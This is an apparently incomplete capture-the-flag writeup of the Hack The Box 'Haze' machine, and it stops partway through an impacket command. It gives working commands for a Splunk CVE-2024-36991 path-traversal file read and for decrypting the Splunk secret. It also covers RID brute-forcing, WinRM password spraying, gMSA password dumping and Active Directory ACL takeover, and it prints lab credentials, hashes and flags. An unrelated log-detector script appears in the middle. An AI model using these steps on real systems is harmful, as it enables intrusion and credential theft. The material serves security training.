Half Writeup Haze

The document provides detailed information about a server with IP address 10.10.11.61 running Microsoft Windows Server 2022 and Splunkd httpd version 9.2.1. It lists open ports, discovered user and root flags, and outlines vulnerabilities along with a specific CVE-2024-36991 exploit for accessing sensitive files. The document also includes steps for enumeration and exploitation, detailing the process of using a Python script to exploit the server's vulnerabilities.

Uploaded by

21r21a6238

Haze

General Information
IP address: 10.10.11.61
Operating System Name (Distribution): Microsoft Windows Server 2022 Standard
Operating System Kernel Version: 10.0.20348 N/A Build 20348
Web Server Software and Version: Splunkd httpd 9.2.1
Open Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 8000, 8088, 8089

Found Flags

💡 Copy the flag into the designated section. Also put a screenshot of the screen where the flag was found in this section.

User Flag

💡 User Flag: 4e05595e91d9d1935b6d9124ff1c8c63

Root Flag

💡 Root Flag: 900dc84bcaed8c08c3aac7ad55e86ed9

Found Vulnerabilities

Haze 1
💡 Fill in every vulnerability you found here and leave a link for detailed information about it. You must also explain here what the vulnerability can lead to and which exploit it can be broken with. The vulnerability listed first is given as an example. Enter every vulnerability you can find.

CVE-XXXX-XXXX | This CVE exists in version 2.X.X of application X and helps the attacker carry out attack X. This vulnerability is called the X vulnerability. It can be studied in detail via this link. [Leave a link.] | Exploit link must be provided if one exists

Report

💡 At each stage, describe what you did in detail, with screenshots and the exploits you used.

Enumeration (Information Gathering)


┌──(kali㉿kali)-[~]
└─$ nmap -sSCV -Pn 10.10.11.61 -min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-29 15:16 EDT
Nmap scan report for 10.10.11.61
Host is up (0.10s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-30 03:16:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb

| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
8088/tcp open ssl/http Splunkd httpd
|_http-title: 404 Not Found
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-30T03:17:09
|_ start_date: N/A
|_clock-skew: 8h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.21 seconds

We have a website on port 8000; now we take a look at it, but first we add the domain to /etc/hosts


┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.61 haze.htb dc01.haze.htb

Splunk is running here, so now we search for a CVE for it

Now we search GitHub for this CVE

Exploitation (Breaking In)
Now we download it and try running it

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ git clone https://github.com/bigb0x/CVE-2024-36991.git
Cloning into 'CVE-2024-36991'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 22 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (22/22), 135.19 KiB | 456.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ ll
total 4
drwxrwxr-x 4 kali kali 4096 Mar 29 15:28 CVE-2024-36991


┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ cd CVE-2024-36991

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ ll
total 16
-rw-rw-r-- 1 kali kali 5157 Mar 29 15:28 CVE-2024-36991.py
-rw-rw-r-- 1 kali kali 1570 Mar 29 15:28 README.md
drwxrwxr-x 2 kali kali 4096 Mar 29 15:28 screens

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ python3 CVE-2024-36991.py -u http://haze.htb:8000
/home/kali/Desktop/HTB/Haze/CVE-2024-36991/CVE-2024-36991.py:53: SyntaxWarning: invalid escape sequence '\ '
""")

______ _______ ____ ___ ____ _ _ _____ __ ___ ___ _


/ ___\ \ / | ____| |___ \ / _ |___ \| || | |___ / / /_ / _ \ / _ \/ |
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ |_ \| '_ | (_) | (_) | |
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|________) | (_) \__, |\__, | |
\____| \_/ |_____| |_____|\___|_____| |_| |____/ \___/ /_/ /_/|_|

-> POC CVE-2024-36991. This exploit will attempt to read Splunk /etc/passwd file.
-> By x.com/MohamedNab1l
-> Use Wisely.

[INFO] Log directory created: logs


[INFO] Testing single target: http://haze.htb:8000
[VLUN] Vulnerable: http://haze.htb:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

We have hashes, but they could not be cracked, so now we try to pull information with Burp Suite the way this CVE writeup shows:
https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.


# 127.0.0.1 localhost
# ::1 localhost

Now we check the authentication.conf file:

/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/a

[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]


SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

https://github.com/HurricaneLabs/splunksecrets

┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ git clone https://github.com/HurricaneLabs/splunksecrets.git
Cloning into 'splunksecrets'...
remote: Enumerating objects: 344, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 344 (delta 20), reused 15 (delta 15), pack-reused 321 (from 1)
Receiving objects: 100% (344/344), 89.25 KiB | 247.00 KiB/s, done.
Resolving deltas: 100% (204/204), done.

┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ cd splunksecrets

┌──(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ python3 -m venv venv

┌──(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ source venv/bin/activate

┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ pip3 install splunksecrets
Collecting splunksecrets
Downloading splunksecrets-1.0.0.tar.gz (8.4 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Collecting click>=8.0.0 (from splunksecrets)
Using cached click-8.1.8-py3-none-any.whl.metadata (2.3 kB)
Collecting cryptography>=3.2 (from splunksecrets)
Using cached cryptography-44.0.2-cp39-abi3-manylinux_2_34_x86_64.whl.metadata (5.7 kB)
Collecting pcrypt (from splunksecrets)
Downloading pcrypt-1.0.5.tar.gz (6.0 kB)


┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/auth/splunk.secret"
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ vim splunk.secret


┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ splunksecrets splunk-decrypt -S splunk.secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

user: Paul Taylor
password: Ld@p_Auth_Sp1unk@2k24
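As an added example (not code from this writeup or from the exploit repository): a Python detector that scans constructed splunkd web access log lines for the CVE-2024-36991 traversal pattern used above, `/modules/messaging/` followed by `C:../` or `../` segments, and reports which file each request resolved to. The log line format, the sample entries and the source addresses are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the shape of Splunk Web's access log (assumed format, not
# real traffic). The first three mimic the traversal requests used in this writeup
# (the third is double-encoded); the last two are benign requests to the same module.
SAMPLE_LOG = """\
10.10.14.5 - - [29/Mar/2025:15:40:01.123 -0400] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/passwd HTTP/1.1" 200 1337 - - - 12ms
10.10.14.5 - - [29/Mar/2025:15:41:10.456 -0400] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/authentication.conf HTTP/1.1" 200 2048 - - - 9ms
10.10.14.5 - - [29/Mar/2025:15:42:00.000 -0400] "GET /en-US/modules/messaging/%252e%252e%2F%252e%252e%2Fetc%2Fauth%2Fsplunk.secret HTTP/1.1" 200 256 - - - 8ms
10.10.14.9 - - [29/Mar/2025:15:43:00.000 -0400] "GET /en-US/modules/messaging/messaging.js HTTP/1.1" 200 4096 - - - 3ms
10.10.14.9 - - [29/Mar/2025:15:44:00.000 -0400] "GET /en-US/account/login?return_to=%2Fen-US%2F HTTP/1.1" 200 5120 - - - 5ms
"""

# Common-log-style request line: source, timestamp, method, path, status.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
DOTDOT_SEGMENT = re.compile(r"^(?:[A-Za-z]:)?\.\.$")  # ".." or the Windows form "C:.."
DRIVE_SEGMENT = re.compile(r"^[A-Za-z]:$")            # bare "C:" restarts an absolute path


def decode_path(raw_path: str) -> str:
    """Strip the query string and URL-decode repeatedly (bounded) so that
    double-encoded traversal sequences are not missed."""
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def analyse_path(raw_path: str):
    """Return (is_traversal, resolved_target) for one request path.
    Only requests under the vulnerable /modules/messaging/ handler are examined."""
    path = decode_path(raw_path)
    if "/modules/messaging/" not in path:
        return False, None
    segments = path.split("/modules/messaging/", 1)[1].split("/")
    suspicious = False
    target = []
    for seg in segments:
        if DOTDOT_SEGMENT.match(seg):
            suspicious = True
            if target:
                target.pop()          # step up one directory
            continue
        if DRIVE_SEGMENT.match(seg):
            suspicious = True
            target = [seg]            # "C:" makes the rest an absolute drive path
            continue
        target.append(seg)
    return suspicious, ("/".join(target) if suspicious else None)


def scan(log_text: str):
    """Run the traversal check over every parsable line; a 200 status on a
    flagged request means the file read most likely succeeded."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        hit, target = analyse_path(m["path"])
        if hit:
            findings.append({
                "src": m["src"], "ts": m["ts"], "target": target,
                "status": int(m["status"]), "succeeded": m["status"] == "200",
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "READ" if f["succeeded"] else "attempt"
        print(f'{f["ts"]} {f["src"]} {flag} {f["target"]}')
```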
Now we scan with nxc


┌──(kali㉿kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 512: HAZE\Domain Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 513: HAZE\Domain Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 514: HAZE\Domain Guests (SidTypeGroup)
SMB 10.10.11.61 445 DC01 515: HAZE\Domain Computers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 516: HAZE\Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 517: HAZE\Cert Publishers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 518: HAZE\Schema Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 519: HAZE\Enterprise Admins (SidTypeGroup)

SMB 10.10.11.61 445 DC01 520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.61 445 DC01 521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 525: HAZE\Protected Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 526: HAZE\Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1101: HAZE\DnsAdmins (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1112: HAZE\Support_Services (SidTypeGroup)


┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser"
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)

Now we extract the user names


┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt

┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

Now we try to find out which users we can connect to via evil-winrm, testing our password Ld@p_Auth_Sp1unk@2k24 against each of them


┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ crackmapexec winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
HTTP 10.10.11.61 5985 10.10.11.61 [*] http://10.10.11.61:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\DC01$:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

mark.adams can log in, so now we connect


Initial Access (Gaining Access)

┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\mark.adams\Documents>

We try to obtain the Group Managed Service Account (gMSA) password with our user

https://github.com/micahvandeusen/gMSADumper

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> Domain Admins

==============================================================
*Evil-WinRM* PS C:\Users\mark.adams\Desktop> Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"

=========================================================================

┌──(kali㉿kali)-[~/Desktop/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> mark.adams
Haze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebc
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01eda60fd
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95

We change the owner of the SUPPORT_SERVICES object to the Haze-IT-Backup$ account


┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ impacket-owneredit -action write -target 'SUPPORT_SERVICES' -new-owner 'Haze-IT-Backup$' haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb

/usr/share/doc/python3-impacket/examples/owneredit.py:87: SyntaxWarning: invalid escape sequence '\V'


'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/owneredit.py:96: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:97: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:98: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/owneredit.py:100: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:101: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:102: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/owneredit.py:103: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:104: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:105: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:106: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',

/usr/share/doc/python3-impacket/examples/owneredit.py:107: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:108: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:109: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:110: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:111: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/owneredit.py:112: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:113: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below


[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!

We grant the Haze-IT-Backup$ account full control over the SUPPORT_SERVICES object

┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'Haze-IT-Backup$' haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
